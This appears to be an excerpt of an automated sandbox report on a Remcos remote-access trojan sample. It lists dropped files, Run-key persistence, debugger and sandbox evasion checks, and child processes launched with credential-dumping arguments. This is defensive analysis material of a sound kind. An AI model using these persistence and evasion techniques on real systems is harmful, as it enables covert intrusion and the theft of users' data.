                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B4E56 push ecx; ret 0_2_156B4E69
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DC963 push eax; retf 0_2_156DC981
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156DC983 pushad ; retf 0_2_156DC989
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156D7A28 push eax; ret 0_2_156D7A46
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02E0A2F4 push 02E0A35Fh; ret 0_2_02E0A357
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE32F0 push eax; ret 0_2_02DE332C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFD20C push ecx; mov dword ptr [esp], edx 0_2_02DFD211
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE6374 push 02DE63CFh; ret 0_2_02DE63C7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE6372 push 02DE63CFh; ret 0_2_02DE63C7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02E0A0AC push 02E0A125h; ret 0_2_02E0A11D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF3028 push 02DF3075h; ret 0_2_02DF306D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF3027 push 02DF3075h; ret 0_2_02DF306D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02E0A1F8 push 02E0A288h; ret 0_2_02E0A280
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02E0A144 push 02E0A1ECh; ret 0_2_02E0A1E4

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\extrac32.exe | File created: C:\Users\Public\Libraries\Cmzcxhwn.PIF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15686EB0 ShellExecuteW,URLDownloadToFileW, 0_2_15686EB0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File created: C:\ProgramData\Remcos\remcos.exe
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File created: C:\Users\Public\Libraries\easinvoker.exe
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File created: C:\Users\Public\Libraries\netutils.dll

                      Boot Survival

                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cmzcxhwn
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_1569AB0D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_1569CB50
Source: C:\Users\user\Desktop\fu56fbrtn8.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\fu56fbrtn8.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Remcos\remcos.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\ProgramData\Remcos\remcos.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exe    Process information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exe    Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568F7A7 Sleep,ExitProcess,0_2_1568F7A7
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A9F7A7 Sleep,ExitProcess,8_2_14A9F7A7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_1569A748
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_14AAA748
                      Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 2047
                      Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 7621
                      Source: C:\ProgramData\Remcos\remcos.exe Window / User API: foregroundWindowGot 1742
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe API coverage: 8.9 %
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF API coverage: 1.7 %
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 1736 Thread sleep time: -62000s >= -30000s
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 3232 Thread sleep time: -6141000s >= -30000s
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 3232 Thread sleep time: -22863000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15689665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689665
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_1568C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15689253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689253
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1569C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_1569C291
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_1568BD37
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156CE879 FindFirstFileExA,0_2_156CE879
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568783C FindFirstFileW,FindNextFileW,0_2_1568783C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_1568880C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1568BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_1568BB30
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15699AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_15699AF5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_02DE58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DE58CC
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_33A510F1
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A56580 FindFirstFileExA,6_2_33A56580
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14ADE879 FindFirstFileExA,8_2_14ADE879
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A99665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_14A99665
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A9783C FindFirstFileW,FindNextFileW,8_2_14A9783C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A9880C FindFirstFileW,FindNextFileW,FindClose,8_2_14A9880C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AAC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_14AAC291
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AA9AF5 FindFirstFileW,8_2_14AA9AF5
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A9BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_14A9BB30
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14A9C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_14A9C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15687C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_15687C97
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWUo
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(=
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.0000000000958000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: Cmzcxhwn.PIF, 00000012.00000002.1787599140.00000000005D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
                      Source: Cmzcxhwn.PIF, 00000008.00000002.1531336451.00000000008F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe API call chain: ExitProcess graph end node
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF API call chain: ExitProcess graph end node
                      Source: C:\ProgramData\Remcos\remcos.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156B49F9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1569CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_1569CB50
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156C32B5 mov eax, dword ptr fs:[00000030h] 0_2_156C32B5
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A54AB4 mov eax, dword ptr fs:[00000030h] 6_2_33A54AB4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AD32B5 mov eax, dword ptr fs:[00000030h] 8_2_14AD32B5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15692077 GetProcessHeap,HeapFree,0_2_15692077
                      Source: C:\ProgramData\Remcos\remcos.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_156B4FDC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156B49F9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156B4B47 SetUnhandledExceptionFilter,0_2_156B4B47
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156BBB22
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_33A52B1C
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_33A52639
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: 6_2_33A560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_33A560E2
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AC4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_14AC4FDC
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AC49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14AC49F8
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AC49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14AC49F9
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14ACBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14ACBB22
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: 8_2_14AC4B47 SetUnhandledExceptionFilter,8_2_14AC4B47

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_156920F7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_15699627 mouse_event,0_2_15699627
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"
                      Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\`
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.000000000077C000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\28
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\rg:
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\w
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\31
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\s|X
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\*|
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\n
                      Source: remcos.exe, 00000006.00000002.3819338341.000000000077C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managert
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\S
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managermcos\remcos.exexe
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\i
                      Source: remcos.exe, 00000006.00000002.3819232580.000000000076C000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204886871.0000000000766000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\*
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager16\J
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000078E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.000000000078E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.dr Binary or memory string: [Program Manager]
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156B4C52 cpuid 0_2_156B4C52
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoW,0_2_156D2543
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_156D243C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: EnumSystemLocalesW,0_2_156C8404
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_156D2610
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: EnumSystemLocalesW,0_2_156D2036
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_156D20C3
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoW,0_2_156D2313
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_156D1CD8
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: EnumSystemLocalesW,0_2_156D1F50
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: EnumSystemLocalesW,0_2_156D1F9B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoW,0_2_156C88ED
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoA,0_2_1568F8D1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02DFD5D0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DE5A90
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoA,0_2_02DEA7CC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetLocaleInfoA,0_2_02DEA780
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DE5B9C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02DFD5D0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02E05FA0
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: CoInitialize,EnumSystemLocalesA,6_2_02E0D5D0
                      Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesA,6_2_02E15F9F
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesA,8_2_02D7D5D0
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesA,8_2_02D85F9F
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_14AE1CD8
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_14AE243C
